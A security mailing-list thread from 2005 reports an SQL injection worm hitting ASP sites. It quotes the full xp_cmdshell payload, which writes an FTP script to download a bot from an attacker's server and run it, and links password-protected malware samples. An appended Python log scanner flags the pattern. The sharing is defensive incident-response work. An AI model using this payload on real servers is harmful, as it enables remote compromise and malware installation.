Open Source and information security mailing list archives
From: mducharme at cybergeneration.com (Maxime Ducharme)
Subject: Re: [Dshield] SQL injection worm ?


Hi to the List

Today we received the same SQL injection attack
on the same URL:

IP: 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent: none sent
HTTP Verb: GET /theasppage.asp?anID=
Attack:
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection:
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 Jan. doesn't find anything
suspicious.

I'm interested if someone does an analysis on this file.

Have a nice day

Maxime Ducharme
Programmer / Network security specialist


----- Original Message ----- 
From: "Maxime Ducharme" <mducharme@...ergeneration.com>
To: <full-disclosure@...ts.netsys.com>; "General DShield Discussion List"
<list@...ts.dshield.org>; <incidents@...urityfocus.com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?


>
> Hi list,
>     we received a particular SQL injection attack
> on one of our sites.
>
> Attack looks like:
> 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20open%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -
>
> HTTP request contains only 2 fields (besides the HTTP method):
> Connection: Keep-Alive
> Host: attacked.web.site.com
>
> (I obviously replaced the name of the site).
>
> Decoded SQL injection looks like:
> exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
> exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
> %systemroot%\system32\macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo get rBot.exe
> %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo quit >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell
> 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'del
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
>
> y.y.y.y is a foreign IP in Europe which hosts FTP and WWW servers.
> I sent a notice to this site's sysadmin about the situation.
>
> I have been able to connect to this FTP with the account hahajk/hahaowned
> (which does not seem legit to me ...) and download suspicious files.
> I mirrored them here :
> http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
> zip pass is 968goyw439807r3qw
>
> 24.164.202.24 is on rr.com networks, they have also been advised.
>
> I know rbot.exe is known to be the Randex worm, but I'd like to have
> some other results / analysis.
>
> I also found a "test.asp" file which contains the Spybot worm.
>
> Weird thing is, I searched for this host's activity on every server
> and every firewall we run, and I only see 1 TCP connection which
> is the prepared SQL injection attack, nothing else.
>
> Anybody see similar activity ?
>
> I'm asking since I want to know if we are targeted by someone or
> by a worm like Santy that uses search engines to find vulnerable
> ASP scripts.
>
> Thanks in advance
>
> Happy new year to everyone !
>
> Maxime Ducharme
> Programmer / Network security specialist
>
>
>
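The post's raw IIS log line shows why a plain grep of web logs for "xp_cmdshell" misses this worm: the attacker hex-encoded "exec MASTER..xp_cmdshell" in the query string, so the indicator only appears after percent-decoding. The following Python is an added detection example written for this thread, not code from the poster or from any tool the thread mentions. It assumes the W3C field order visible in the post's log line (date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query ...), the indicator list is an assumption about what a defender would flag, and the sample log lines are constructed (the encoded prefix is the one the post shows, shortened):

```python
"""Decode the cs-uri-query field of IIS W3C log lines and flag the
xp_cmdshell stacked-query pattern seen in the post.

Added example, not from the original message. Field order and the
indicator list are assumptions; SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote

# Indicators: names and patterns are assumptions drawn from the decoded payload
# in the post (stacked query, MASTER.. prefix, xp_cmdshell, ftp -s: script, '--).
INDICATORS = [
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("master_prefix", re.compile(r"\bmaster\s*\.\.", re.I)),
    ("stacked_query", re.compile(r"'\s*;\s*exec\b", re.I)),
    ("quote_comment", re.compile(r"'--")),
    ("ftp_script", re.compile(r"ftp\.exe\s+-.*-s:", re.I)),
]


def decode_query(raw: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded %2578 -> %78 -> x is caught as well as single encoding."""
    cur = raw
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def parse_iis_line(line: str):
    """Split one W3C extended line into the fields we need.
    Returns None for #-directive lines, blank lines, or too-short records."""
    if not line or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 11:
        return None
    return {"date": f[0], "time": f[1], "c_ip": f[2],
            "method": f[8], "stem": f[9], "query": f[10]}


def scan_line(line: str):
    """Decode the query field and return a finding dict, or None if clean."""
    rec = parse_iis_line(line)
    if rec is None:
        return None
    decoded = decode_query(rec["query"])
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    if not hits:
        return None
    return {"c_ip": rec["c_ip"], "stem": rec["stem"],
            "indicators": hits, "decoded": decoded}


def scan_log(lines):
    """Run scan_line over an iterable of log lines; keep only findings."""
    return [r for r in (scan_line(ln) for ln in lines) if r]


# Constructed sample: one hex-encoded injection (prefix as in the post), one
# benign request, one double-encoded variant that a single decode would miss.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port "
    "cs-method cs-uri-stem cs-uri-query sc-status",
    "2005-01-05 14:39:20 203.0.113.7 - W3SVC1 SRV 10.0.0.5 80 GET /Nouvelles.asp "
    "id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68"
    "%65%6C%6C%20'ftp.exe%20-i%20-n%20-s:x.jkd'-- 500",
    "2005-01-05 14:40:01 198.51.100.9 - W3SVC1 SRV 10.0.0.5 80 GET /Nouvelles.asp "
    "id_nouvelle=377 200",
    "2005-01-05 14:41:10 203.0.113.7 - W3SVC1 SRV 10.0.0.5 80 GET /Nouvelles.asp "
    "id_nouvelle=1%2527%253B%2565%2578%2565%2563%2520master..xp_cmdshell 500",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["c_ip"], finding["stem"], finding["indicators"])
        print("  decoded:", finding["decoded"])
```

The decode loop is bounded on purpose: it catches the double-encoded case without looping forever on input that happens to contain literal percent signs, and matching is done only on the decoded text so the raw-log hex escapes in the post no longer hide the indicator.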

